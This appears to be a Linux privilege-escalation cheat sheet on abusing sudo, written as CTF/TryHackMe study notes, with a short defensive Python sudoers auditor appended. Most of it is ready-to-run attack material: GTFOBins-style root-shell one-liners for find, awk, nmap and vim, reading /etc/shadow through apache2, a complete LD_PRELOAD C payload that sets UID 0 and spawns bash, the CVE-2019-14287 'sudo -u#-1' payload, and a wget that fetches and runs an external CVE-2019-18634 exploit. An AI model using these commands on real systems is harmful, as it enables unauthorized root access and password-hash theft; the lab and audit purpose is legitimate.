Sudo

sudo -l

Enumeration

Always check sudo -l at the beginning of the privilege escalation phase.

The command sudo allows the current user to execute certain commands as other users. To view a list of such commands:

sudo -l

In the trivial case, the current user can execute any command as any user:

In this case we can spawn a root shell directly through sudo:

sudo /bin/bash -p

Method 1: GTFOBins

For a privesc cheatsheet, check out GTFOBins:

Examples

If find is in sudo -l:

sudo find /bin -name nano -exec /bin/sh \;

If awk is in sudo -l:

sudo awk 'BEGIN {system("/bin/sh")}'

If nmap is in sudo -l:

echo "os.execute('/bin/sh')" > shell.nse && sudo nmap --script=shell.nse

If vim is in sudo -l:

sudo vim -c ':!/bin/sh'

Method 2: Intended Functionality

apache2

If apache2 is in sudo -l, then we can read the root password hash from /etc/shadow by making apache2 parse that file as its configuration: the syntax error it reports quotes the first line it could not parse, which is root's entry:

sudo apache2 -f /etc/shadow

wget

A wget privesc example:

Method 3: LD_PRELOAD

LD_PRELOAD is an environment variable that lists shared libraries whose functions override the standard ones, in the same way /etc/ld.so.preload does. Both are handled by the dynamic loader /lib/ld-linux.so.

If sudo -l shows that LD_PRELOAD is preserved in the environment (env_keep) alongside some permitted command, for example /usr/sbin/apache2:

env_reset, env_keep+=LD_PRELOAD
...
(root) NOPASSWD: /usr/sbin/apache2

then we can utilize this "feature" for privilege escalation. Store the following C program in /tmp:

x.c
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h> // setgid(), setuid()

void _init()
{
	unsetenv("LD_PRELOAD"); // Unset LD_PRELOAD so the spawned shell is not hooked again
	setgid(0); // Set GID to root
	setuid(0); // Set UID to root
	system("/bin/bash"); // Execute /bin/bash
}

Compile it:

gcc -fPIC -shared -o x.so x.c -nostartfiles

Trigger it by running any command that sudo permits with the variable set (the command itself does not matter; apache2 is just the example from the sudo -l output above):

sudo LD_PRELOAD=/tmp/x.so /usr/sbin/apache2

Then we will get a root shell.

Method 4: Attacking Sudo Itself

CVE-2019-14287

If sudo -l shows we can execute /bin/bash as any user other than root:

(ALL, !root) /bin/bash

Joe Vennix found that if you specify a UID of -1 (or its unsigned equivalent: 4294967295), Sudo would incorrectly read this as being 0 (i.e. root). This means that by specifying a UID of -1 or 4294967295, you can execute a command as root, despite being explicitly prevented from doing so.

That means we can get a root shell using the following payload:

sudo -u#-1 /bin/bash

Test this CVE in TryHackMe:

CVE-2019-18634

In /etc/sudoers there is an option named pwfeedback, which is turned off by default. If it is turned on, sudo gives you "feedback" when you type your password by printing an asterisk for each character you type.

In Sudo 1.8.25p, this pwfeedback option leads to a buffer overflow vulnerability if it is turned on. To exploit this vulnerability, download the C source code:

wget https://raw.githubusercontent.com/saleemrashid/sudo-cve-2019-18634/master/exploit.c

Compile it:

gcc -o exploit exploit.c

Make it executable and run it:

chmod +x exploit ; ./exploit

Test this CVE in TryHackMe:
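As an added defensive check that is not part of the original notes, the following Python script scans sudoers text or copied sudo -l output for the conditions the methods above rely on: LD_PRELOAD kept via env_keep (Method 3), pwfeedback enabled (CVE-2019-18634), a runas list that excludes root (CVE-2019-14287), unrestricted ALL entries, and sudo targets named on this page such as find, vim or apache2. The input is a constructed sample, and the names audit_sudo, SAMPLE, RISKY_TARGETS and SPEC_RE are my own.

```python
import re

# Constructed sample mixing sudoers syntax with the "(runas) cmds" lines that
# "sudo -l" prints; it is not captured from a real host.
SAMPLE = """\
Defaults env_reset
Defaults env_keep+=LD_PRELOAD
Defaults pwfeedback
root ALL=(ALL:ALL) ALL
alice ALL=(ALL, !root) /bin/bash
bob ALL=(root) NOPASSWD: /usr/bin/find, /usr/bin/vim
    (root) NOPASSWD: /usr/sbin/apache2
    (ALL) ALL
"""

# Targets named on this page and why each matters when runnable via sudo.
RISKY_TARGETS = {"bash": "shell", "sh": "shell", "find": "shell escape",
                 "awk": "shell escape", "nmap": "shell escape",
                 "vim": "shell escape", "apache2": "file read"}

# Matches "user host=(runas) cmds" (sudoers) or "(runas) cmds" (sudo -l).
SPEC_RE = re.compile(r"^(?:(\S+)\s+\S+\s*=\s*)?\(([^)]*)\)\s*(.*)$")

def audit_sudo(text):
    findings = []  # (category, offending line) pairs
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()  # drop comments and indentation
        if not line:
            continue
        if re.search(r"env_keep\s*\+?=\s*\S*LD_PRELOAD", line):
            findings.append(("env_keep LD_PRELOAD", line))  # Method 3
        if re.search(r"(?<!!)\bpwfeedback\b", line):  # "!pwfeedback" is safe
            findings.append(("pwfeedback", line))  # CVE-2019-18634
        m = SPEC_RE.match(line)
        if not m:
            continue
        user, runas, cmds = m.groups()
        if user == "root":
            continue  # root's own entry is expected
        if re.search(r"!\s*root", runas):
            findings.append(("runas excludes root", line))  # CVE-2019-14287
        cmds = re.sub(r"^(?:NOPASSWD|PASSWD|SETENV|NOSETENV):\s*", "", cmds)
        for target in [e.split()[0] for e in cmds.split(",") if e.split()]:
            base = target.rsplit("/", 1)[-1]
            if target == "ALL":
                findings.append(("unrestricted", line))
            elif base in RISKY_TARGETS:
                findings.append((f"{RISKY_TARGETS[base]} via {base}", line))
    return findings
```

Feed it the contents of /etc/sudoers (and /etc/sudoers.d/*) or pasted sudo -l output; an empty result means none of the conditions above were found.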

Challenge: TryHackMe - Simple CTF
